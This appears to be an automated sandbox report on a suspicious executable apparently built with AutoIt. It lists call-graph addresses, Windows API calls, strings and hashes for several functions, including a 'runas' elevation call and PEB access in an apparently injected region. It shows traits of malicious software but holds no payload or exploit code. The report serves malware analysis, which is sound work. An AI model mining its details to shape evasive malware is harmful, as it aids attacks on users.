40e71b 86433->86434 86435 4115d7 52 API calls 86434->86435 86436 40e729 86435->86436 86437 40e734 86436->86437 86438 426bdc 86436->86438 86439 426be7 86437->86439 86441 401b10 52 API calls 86437->86441 86438->86439 86440 40bc70 52 API calls 86438->86440 86440->86439 86442 40e743 86441->86442 86442->86419 86442->86420 86444 479786 86443->86444 86445 479aed 86443->86445 86444->86445 86447 479798 86444->86447 86512 451b42 61 API calls 86445->86512 86449 4797a2 86447->86449 86450 4797be 86447->86450 86448 479b00 86448->86423 86505 451b42 61 API calls 86449->86505 86452 4797c7 86450->86452 86453 4797e3 86450->86453 86506 451b42 61 API calls 86452->86506 86483 441eba 86453->86483 86454 4797b5 86454->86423 86457 4797da 86457->86423 86458 4797f7 86459 479815 86458->86459 86460 4797fe 86458->86460 86464 47983c 86459->86464 86488 451d2b 86459->86488 86507 451b42 61 API calls 86460->86507 86462 47980c 86462->86423 86468 4798e6 86464->86468 86499 479714 86464->86499 86465 47994b VariantInit 86470 479980 __crtGetStringTypeA_stat 86465->86470 86468->86465 86469 479916 VariantClear 86468->86469 86469->86468 86471 479a2c 86470->86471 86472 479a44 86470->86472 86473 479a0b 86470->86473 86473->86471 86484 441f12 86483->86484 86485 441ecc _wcslen 86483->86485 86484->86458 86485->86484 86486 410160 52 API calls 86485->86486 86487 441ede 86486->86487 86487->86458 86490 451d5e 86488->86490 86489 451e93 SysFreeString 86492 451ea0 86489->86492 86490->86489 86491 451f21 86490->86491 86490->86492 86498 451d68 86490->86498 86491->86492 86493 451f6d lstrcmpiW 86491->86493 86494 451f7f SysFreeString 86491->86494 86495 451fab 86491->86495 86492->86498 86513 44a545 RaiseException 86492->86513 86493->86494 86494->86491 86495->86464 86498->86464 86500 479728 86499->86500 86514 479500 VariantInit 86500->86514 86505->86454 86506->86457 86507->86462 86512->86448 86513->86492 86573 4289d2 86572->86573 86574 408db3 86572->86574 86602 45e737 90 API calls 3 library calls 86573->86602 86598 40bec0 86574->86598 86577 408dc9 86578 4289e5 86577->86578 86580 40ba10 52 API calls 86577->86580 86581 428a05 86577->86581 86583 40a780 199 API calls 86577->86583 86584 408e5a 86577->86584 86585 408e64 86577->86585 86587 408f40 VariantClear 86577->86587 86603 45e737 90 API calls 3 library calls 86578->86603 86580->86577 86582 408f40 VariantClear 86581->86582 86582->86584 86583->86577 86584->86072 86586 408f40 VariantClear 86585->86586 86586->86584 86587->86577 86589 408f40 VariantClear 86588->86589 86590 403d20 86589->86590 86591 403cd0 VariantClear 86590->86591 86592 403d4d 86591->86592 86605 477145 86592->86605 86610 46f8cb 86592->86610 86629 4755ad 86592->86629 86593 403d76 86593->86069 86593->86080 86597->86069 86599 40bed0 86598->86599 86600 40bef2 86599->86600 86604 45e737 90 API calls 3 library calls 86599->86604 86600->86577 86602->86578 86603->86581 86604->86600 86606 408e80 VariantClear 86605->86606 86607 47715a 86606->86607 86632 467ac4 86607->86632 86609 477160 86609->86593 86611 46f8e7 86610->86611 86612 46f978 86610->86612 86613 46f900 86611->86613 86614 46f93c 86611->86614 86615 46f91a 86611->86615 86616 46f8ee 86611->86616 86612->86593 86617 45340c 85 API calls 86613->86617 86619 45340c 85 API calls 86614->86619 86618 45340c 85 API calls 86615->86618 86620 45340c 85 API calls 86616->86620 86617->86616 86621 46f931 86618->86621 86622 46f958 86619->86622 86623 46f971 86620->86623 86624 45340c 85 API calls 86621->86624 86625 45340c 85 API calls 86622->86625 86655 46cb5f 86623->86655 86624->86616 86627 46f95f 86625->86627 86628 45340c 85 API calls 86627->86628 86628->86616 86705 475077 86629->86705 86631 4755c0 86631->86593 86633 467bb8 86632->86633 86634 467adc 86632->86634 86633->86609 86635 467c16 86634->86635 86636 467b90 86634->86636 86637 467c1d 86634->86637 86647 467aed 86634->86647 86654 40e270 VariantClear moneypunct 86635->86654 86640 4115d7 52 API calls 86636->86640 86639 4115d7 52 API calls 86637->86639 86651 467b75 _memmove 86639->86651 86640->86651 86641 467b55 86643 4115d7 52 API calls 86641->86643 86642 4115d7 52 API calls 86642->86633 86644 467b5b 86643->86644 86652 442ee0 52 API calls 86644->86652 86645 4115d7 52 API calls 86650 467b28 moneypunct 86645->86650 86647->86645 86647->86650 86648 467b6b 86653 45f645 54 API calls moneypunct 86648->86653 86650->86637 86650->86641 86650->86651 86651->86642 86652->86648 86653->86651 86654->86637 86656 40bc70 52 API calls 86655->86656 86657 46cb7e 86656->86657 86658 40bc70 52 API calls 86657->86658 86659 46cb86 86658->86659 86660 40bc70 52 API calls 86659->86660 86661 46cb91 86660->86661 86662 408f40 VariantClear 86661->86662 86663 46cbaf 86662->86663 86664 46cbd4 CLSIDFromProgID 86663->86664 86665 46cbc5 OleInitialize 86663->86665 86665->86664 86758 4533eb 86705->86758 86708 4750ee 86710 408f40 VariantClear 86708->86710 86709 475129 86762 4646e0 86709->86762 86718 4750f5 86710->86718 86712 47515e 86713 475162 86712->86713 86738 47518e 86712->86738 86714 408f40 VariantClear 86713->86714 86715 475357 86718->86631 86725 4533eb 85 API calls 86725->86738 86733 475480 86738->86715 86738->86725 86738->86733 86744 4754b5 86738->86744 86794 436299 52 API calls 2 library calls 86738->86794 86795 463ad5 64 API calls __wcsicoll 86738->86795 86759 453404 86758->86759 86760 4533f8 86758->86760 86759->86708 86759->86709 86760->86759 86805 4531b1 85 API calls 5 library calls 86760->86805 86806 4536f7 53 API calls 86762->86806 86764 4646fc 86807 4426cd 59 API calls _wcslen 86764->86807 86766 464711 86768 40bc70 52 API calls 86766->86768 86774 46474b 86766->86774 86769 46472c 86768->86769 86808 461465 52 API calls _memmove 86769->86808 86771 464741 86772 40c600 52 API calls 86771->86772 86772->86774 86773 464793 86773->86712 86774->86773 86809 463ad5 64 API calls __wcsicoll 86774->86809 86794->86738 86795->86738 86805->86759 86806->86764 86807->86766 86808->86771 86809->86773 86811->86090 86812->86183 86813->86103 86814->86151 86815->86151 86816->86124 86817->86149 86818->86115 86819->86119 86820->86125 86821->86180 86822->86180 86823->86141 86824->86105 86825->86142 86826->86171 86827->86193 86828->86193 86829->86183 86830->86197 86831->86209 86832->86203 86833->86211 86834->86218 86835->86218 86836->86105 86837 42d154 86841 480a8d 86837->86841 86839 42d161 86840 480a8d 199 API calls 86839->86840 86840->86839 86842 480ae4 86841->86842 86843 480b26 86841->86843 86845 480aeb 86842->86845 86846 480b15 86842->86846 86844 40bc70 52 API calls 86843->86844 86870 480b2e 86844->86870 86848 480aee 86845->86848 86849 480b04 86845->86849 86874 4805bf 199 API calls 86846->86874 86848->86843 86851 480af3 86848->86851 86873 47fea2 199 API calls __itow_s 86849->86873 86872 47f135 199 API calls 86851->86872 86852 40e0a0 52 API calls 86852->86870 86855 408f40 VariantClear 86857 481156 86855->86857 86856 480aff 86856->86855 86859 408f40 VariantClear 86857->86859 86858 40c2c0 52 API calls 86858->86870 86860 48115e 86859->86860 86860->86839 86861 480ff5 86880 45e737 90 API calls 3 library calls 86861->86880 86862 401980 53 API calls 86862->86870 86864 40e710 53 API calls 86864->86870 86865 408e80 VariantClear 86865->86870 86866 40a780 199 API calls 86866->86870 86870->86852 86870->86856 86870->86858 86870->86861 86870->86862 86870->86864 86870->86865 86870->86866 86875 45377f 52 API calls 86870->86875 86876 45e951 53 API calls 86870->86876 86877 40e830 53 API calls 86870->86877 86878 47925f 53 API calls 86870->86878 86879 47fcff 199 API calls 86870->86879 86872->86856 86873->86856 86874->86856 86875->86870 86876->86870 86877->86870 86878->86870 86879->86870 86880->86856 86881 42b14b 86888 40bc10 86881->86888 86883 42b159 86884 4096a0 330 API calls 86883->86884 86885 42b177 86884->86885 86899 44b92d VariantClear 86885->86899 86887 42bc5b 86889 40bc24 86888->86889 86890 40bc17 86888->86890 86892 40bc2a 86889->86892 86893 40bc3c 86889->86893 86891 408e80 VariantClear 86890->86891 86894 40bc1f 86891->86894 86895 408e80 VariantClear 86892->86895 86896 4115d7 52 API calls 86893->86896 86894->86883 86897 40bc33 86895->86897 86898 40bc43 86896->86898 86897->86883 86898->86883 86899->86887 86900 425b2b 86905 40f000 86900->86905 86904 425b3a 86906 4115d7 52 API calls 86905->86906 86907 40f007 86906->86907 86908 4276ea 86907->86908 86914 40f030 86907->86914 86913 41130a 51 API calls __cinit 86913->86904 86915 40f039 86914->86915 86916 40f01a 86914->86916 86944 41130a 51 API calls __cinit 86915->86944 86918 40e500 86916->86918 86919 40bc70 52 API calls 86918->86919 86920 40e515 GetVersionExW 86919->86920 86921 402160 52 API calls 86920->86921 86922 40e557 86921->86922 86945 40e660 86922->86945 86928 427674 86931 4276c6 GetSystemInfo 86928->86931 86930 40e5cd GetCurrentProcess 86966 40ef20 LoadLibraryA GetProcAddress 86930->86966 86933 4276d5 GetSystemInfo 86931->86933 86934 40e5e0 86934->86933 86959 40efd0 86934->86959 86937 40e629 86963 40ef90 86937->86963 86940 40e641 FreeLibrary 86941 40e644 86940->86941 86942 40e653 FreeLibrary 86941->86942 86943 40e656 86941->86943 86942->86943 86943->86913 86944->86916 86946 40e667 86945->86946 86947 42761d 86946->86947 86948 40c600 52 API calls 86946->86948 86949 40e55c 86948->86949 86950 40e680 86949->86950 86951 40e687 86950->86951 86952 427616 86951->86952 86953 40c600 52 API calls 86951->86953 86954 40e566 86953->86954 86954->86928 86955 40ef60 86954->86955 86956 40e5c8 86955->86956 86957 40ef66 LoadLibraryA 86955->86957 86956->86930 86956->86934 86957->86956 86958 40ef77 GetProcAddress 86957->86958 86958->86956 86960 40e620 86959->86960 86961 40efd6 LoadLibraryA 86959->86961 86960->86931 86960->86937 86961->86960 86962 40efe7 GetProcAddress 86961->86962 86962->86960 86967 40efb0 LoadLibraryA GetProcAddress 86963->86967 86965 40e632 GetNativeSystemInfo 86965->86940 86965->86941 86966->86934 86967->86965 86968 425b5e 86973 40c7f0 86968->86973 86972 425b6d 87008 40db10 52 API calls 86973->87008 86975 40c82a 87009 410ab0 6 API calls 86975->87009 86977 40c86d 86978 40bc70 52 API calls 86977->86978 86979 40c877 86978->86979 86980 40bc70 52 API calls 86979->86980 86981 40c881 86980->86981 86982 40bc70 52 API calls 86981->86982 86983 40c88b 86982->86983 86984 40bc70 52 API calls 86983->86984 86985 40c8d1 86984->86985 86986 40bc70 52 API calls 86985->86986 86987 40c991 86986->86987 87010 40d2c0 52 API calls 86987->87010 86989 40c99b 87011 40d0d0 53 API calls 86989->87011 86991 40c9c1 86992 40bc70 52 API calls 86991->86992 86993 40c9cb 86992->86993 87012 40e310 53 API calls 86993->87012 86995 40ca28 86996 408f40 VariantClear 86995->86996 86997 40ca30 86996->86997 86998 408f40 VariantClear 86997->86998 86999 40ca38 GetStdHandle 86998->86999 87000 429630 86999->87000 87001 40ca87 86999->87001 87000->87001 87002 429639 87000->87002 87007 41130a 51 API calls __cinit 87001->87007 87013 4432c0 57 API calls 87002->87013 87004 429641 87014 44b6ab CreateThread 87004->87014 87006 42964f CloseHandle 87006->87001 87007->86972 87008->86975 87009->86977 87010->86989 87011->86991 87012->86995 87013->87004 87014->87006 87015 44b5cb 58 API calls 87014->87015 87016 425b6f 87021 40dc90 87016->87021 87020 425b7e 87022 40bc70 52 API calls 87021->87022 87023 40dd03 87022->87023 87029 40f210 87023->87029 87026 40dd96 87027 40ddb7 87026->87027 87032 40dc00 52 API calls 2 library calls 87026->87032 87028 41130a 51 API calls __cinit 87027->87028 87028->87020 87033 40f250 RegOpenKeyExW 87029->87033 87031 40f230 87031->87026 87032->87026 87034 425e17 87033->87034 87035 40f275 RegQueryValueExW 87033->87035 87034->87031 87036 40f2c3 RegCloseKey 87035->87036 87037 40f298 87035->87037 87036->87031 87038 40f2a9 RegCloseKey 87037->87038 87039 425e1d 87037->87039 87038->87031 87040 3f73c58 87054 3f718a8 87040->87054 87042 3f73d21 87057 3f73b48 87042->87057 87060 3f74d48 GetPEB 87054->87060 87056 3f71f33 87056->87042 87058 3f73b51 Sleep 87057->87058 87059 3f73b5f 87058->87059 87061 3f74d72 87060->87061 87061->87056

                                                      Executed Functions

                                                      Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 004096C1
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • _memmove.LIBCMT ref: 0040970C
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                      • _memmove.LIBCMT ref: 00409D96
                                                      • _memmove.LIBCMT ref: 0040A6C4
                                                      • _memmove.LIBCMT ref: 004297E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                      • String ID:
                                                      • API String ID: 2383988440-0
                                                      • Opcode ID: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                                      • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                      • Opcode Fuzzy Hash: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                                      • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                      Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,00000104,?), ref: 00401F4C
                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                      • String ID: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                      • API String ID: 2495805114-2377430423
                                                      • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                      • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                      Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1528 46cca6-46ccba call 458651 1526->1528 1529 46cc49-46cc60 CoCreateInstance 1526->1529 1527->1526 1530 46cbfb-46cc05 1527->1530 1532 46cc96-46cca1 1528->1532 1539 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1528->1539 1529->1532 1533 46cc62-46cc8b call 43119b 1529->1533 1534 46cc06-46cc30 call 451b42 call 402250 * 3 1530->1534 1532->1534 1550 46cc8e-46cc90 1533->1550 1553 46cdf4 1539->1553 1554 46ccfd-46cd1f call 402160 call 431a2b 1539->1554 1550->1532 1551 46ceb7-46cef0 call 468070 call 402250 * 3 1550->1551 1555 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1553->1555 1569 46cd35-46cd47 call 465177 1554->1569 1570 46cd21-46cd33 1554->1570 1555->1532 1564 46ce50-46ce55 1555->1564 1564->1532 1568 46ce5b-46ce62 1564->1568 1573 46ce64-46ce8b CoSetProxyBlanket 1568->1573 1574 46ce8d-46ce9e 1568->1574 1582 46cd4a-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1569->1582 1575 46cda5-46cdaa 1570->1575 1573->1574 1574->1550 1578 46cea4-46ceb2 1574->1578 1579 46cdac-46cdbb call 4111c1 1575->1579 1580 46cdbd-46cdc0 1575->1580 1578->1534 1581 46cdc3-46cdf2 1579->1581 1580->1581 1581->1555 1582->1575
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                      • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                                      • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                      • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                      • _wcslen.LIBCMT ref: 0046CDB0
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                      • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                      • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                        • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                        • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                        • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                      Strings
                                                      • NULL Pointer assignment, xrefs: 0046CEA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 440038798-2785691316
                                                      • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                      • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                      • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                      • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                      Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1999 40e585-40e596 1995->1999 2000 40e5ba-40e5cb call 40ef60 1995->2000 1997 427683-427686 1996->1997 1998 42767b-427681 1996->1998 2003 427693-427696 1997->2003 2004 427688-427691 1997->2004 2002 4276b4-4276be 1998->2002 2005 427625-427629 1999->2005 2006 40e59c-40e59f 1999->2006 2017 40e5ec-40e60c 2000->2017 2018 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2000->2018 2019 4276c6-4276ca GetSystemInfo 2002->2019 2003->2002 2007 427698-4276a8 2003->2007 2004->2002 2009 427636-427640 2005->2009 2010 42762b-427631 2005->2010 2011 40e5a5-40e5ae 2006->2011 2012 427654-427657 2006->2012 2015 4276b0 2007->2015 2016 4276aa-4276ae 2007->2016 2009->2000 2010->2000 2013 40e5b4 2011->2013 2014 427645-42764f 2011->2014 2012->2000 2020 42765d-42766f 2012->2020 2013->2000 2014->2000 2015->2002 2016->2002 2022 40e612-40e623 call 40efd0 2017->2022 2023 4276d5-4276df GetSystemInfo 2017->2023 2018->2017 2029 40e5e8 2018->2029 2019->2023 2020->2000 2022->2019 2028 40e629-40e63f call 40ef90 GetNativeSystemInfo 2022->2028 2032 40e641-40e642 FreeLibrary 2028->2032 2033 40e644-40e651 2028->2033 2029->2017 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                      • String ID: 0SH
                                                      • API String ID: 3363477735-851180471
                                                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                      Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: IsThemeActive$uxtheme.dll
                                                      • API String ID: 2574300362-3542929980
